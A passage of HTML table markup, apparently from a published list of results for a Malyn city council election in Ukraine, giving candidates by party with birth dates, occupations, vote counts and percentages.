style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">37,3887</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">17</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Данелян Артур Давидович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 11.08.1978 р., освіта вища, безпартійний, ТОВ \"Будівельна кампанія \"Данко\"\", директор, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">116</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">37,0607</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">11</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Мельник Олег Васильович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 29.08.1984 р., освіта вища, член ПАРТІЇ \"БЛОК ПЕТРА ПОРОШЕНКА \"СОЛІДАРНІСТЬ\", ПАТ \"Малинський дослідно-експерементальний завод\", головний енергетик, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">81</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">36,8182</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">22</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Кисельчук Дмитрій Васильович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 09.08.1981 р., освіта вища, безпартійний, тимчасово не працює, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">112</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">35,8974</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">27</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Гордієнко Олександр Миколайович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 26.07.1975 р., освіта вища, безпартійний, тимчасово не працює, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">84</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">35,7447</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">21</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Венгель Світлана Михайлівна</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянка України, народилася 17.03.1970 р., освіта вища, безпартійна, Малинський лісотехнічний коледж, викладач, голова профкому, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">62</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">35,6322</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">34</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Фещенко Микола Іванович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 08.04.1958 р., освіта вища, безпартійний, ТОВ \"Райагрошляхбуд\", директор, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">80</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">35,2423</span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"5\" style=\"border-width: medium 1pt; border-style: none solid; border-color: -moz-use-text-color windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">політична партія Всеукраїнське об&rsquo;єднання \"Батьківщина\"</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Перший кандидат</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Мороз Олена Мирославівна</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянка України, народилася 30.05.1978 р., освіта вища, член політичної партії Всеукраїнське об&rsquo;єднання \"Батьківщина\", Малинська міська рада, секретар, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\">&nbsp;</td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">33</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Столяр Олександр Васильович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 19.06.1960 р., освіта вища, член політичної партії Всеукраїнське об&rsquo;єднання \"Батьківщина\", ФОП, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">98</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">43,5556</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">8</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Грибан Василь Анатолійович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 12.05.1959 р., освіта вища, член політичної партії Всеукраїнське об&rsquo;єднання \"Батьківщина\", Малинський професійно-технічний ліцей, майстер, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">90</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">40,3587</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">29</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Старжинський Ігор Олександрович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 05.05.1992 р., освіта професійно-технічна, член політичної партії Всеукраїнське об&rsquo;єднання \"Батьківщина\", ФОП, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">110</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">35,1438</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">9</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Копилова Анна Вікторівна</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянка України, народилася 13.06.1987 р., освіта вища, член політичної партії Всеукраїнське об&rsquo;єднання \"Батьківщина\", Виконком Малинської міської ради, начальник відділу, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">47</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">34,3066</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">25</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Романішена Ірина Миколаївна</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянка України, народилася 28.10.1976 р., освіта вища, член політичної партії Всеукраїнське об&rsquo;єднання \"Батьківщина\", Редакція газети \"Малинські новини\", журналіст, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">99</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">34,1379</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">18</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Омельченко Максим Аркадійович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 07.01.1974 р., освіта вища, член політичної партії Всеукраїнське об&rsquo;єднання \"Батьківщина\", ФБП НБУ, завідувач спецсектору, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">91</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">33,7037</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">12</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Каленський Ігор Юрійович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 14.05.1976 р., освіта професійно-технічна, член політичної партії Всеукраїнське об&rsquo;єднання \"Батьківщина\", приватний підприємець, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">37</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">32,4561</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">19</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Андрійцев Олександр Миколайович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 29.10.1958 р., освіта вища, член політичної партії Всеукраїнське об&rsquo;єднання \"Батьківщина\", Малинський міськрайонний центр ПМСД, головний лікар, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">70</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">29,7872</span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"5\" style=\"border-width: medium 1pt; border-style: none solid; border-color: -moz-use-text-color windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Народна Партія</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Перший кандидат</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Чушенко Сергій Васильович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 13.07.1972 р., освіта вища, безпартійний, Фабрика банкнотного паперу НБУ, заступник начальника цеху банкнотного та захищеного паперу, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\">&nbsp;</td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">30</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Ситайло Олександр Григорович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 17.08.1986 р., освіта вища, член Народної Партії, ТОВ \"Люкс.Нет\", начальник відділу маркетингу, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">85</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">25,3731</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">7</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Добридень Олександр Миколайович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 01.05.1981 р., освіта вища, член Народної Партії, Державна фіто-санітарна інспекція Житомирської області, провідний спеціаліст-державний фіто- санітарний інспектор, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">54</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">22,3140</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">3</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Лукашенко Віталій Анатолійович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 05.04.1976 р., освіта вища, безпартійний, Фабрика банкнотного паперу НБУ, провідний інженер-програміст сектору АСУ, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">53</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">18,4669</span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"5\" style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Політична партія \"Сила людей\"</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Перший кандидат</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Цьоха Віталій Васильович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 01.01.1983 р., освіта вища, член Політичної партії \"Сила людей\", ФОП, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\">&nbsp;</td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">8</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Єщенко Руслан Миколайович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 12.12.1972 р., освіта вища, безпартійний, ММРТМО, лікар, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">30</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">13,4529</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">17</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Степанова Ганна Миколаївна</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянка України, народилася 01.11.1981 р., освіта вища, член Політичної партії \"Сила людей\", Морозівська ЗОШ, заступник директора, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">42</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">13,4185</span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"5\" style=\"border-width: medium 1pt; border-style: none solid; border-color: -moz-use-text-color windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">ПОЛІТИЧНА ПАРТІЯ \"УКРАЇНСЬКЕ ОБ&rsquo;ЄДНАННЯ ПАТРІОТІВ &ndash; УКРОП\"</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Перший кандидат</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Федоренко Василь Михайлович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 26.09.1958 р., освіта вища, член ПОЛІТИЧНОЇ ПАРТІЇ \"УКРАЇНСЬКЕ ОБ&rsquo;ЄДНАННЯ ПАТРІОТІВ &ndash; УКРОП\", Клуб кікбоксингу \"Файтер\", президент, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\">&nbsp;</td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">26</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Матер&rsquo;ян Микола Якович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 17.03.1971 р., освіта загальна середня, член ПОЛІТИЧНОЇ ПАРТІЇ \"УКРАЇНСЬКЕ ОБ&rsquo;ЄДНАННЯ ПАТРІОТІВ &ndash; УКРОП\", Церква ХВР, пастор, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">28</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">11,5702</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">1</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Задорожній Олександр Вікторович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 21.08.1964 р., освіта вища, член ПОЛІТИЧНОЇ ПАРТІЇ \"УКРАЇНСЬКЕ ОБ&rsquo;ЄДНАННЯ ПАТРІОТІВ &ndash; УКРОП\", Малинський фонд інвалідів, директор, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">30</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">10,0671</span></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"5\" style=\"border-width: medium 1pt; border-style: none solid; border-color: -moz-use-text-color windowtext; padding: 0.75pt;\"><strong><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Радикальна партія Олега Ляшка</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Перший кандидат</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Дмуховська Ірина Миколаївна</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянка України, народилася 19.12.1957 р., освіта професійно-технічна, член Радикальної партії Олега Ляшка, пенсіонер, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 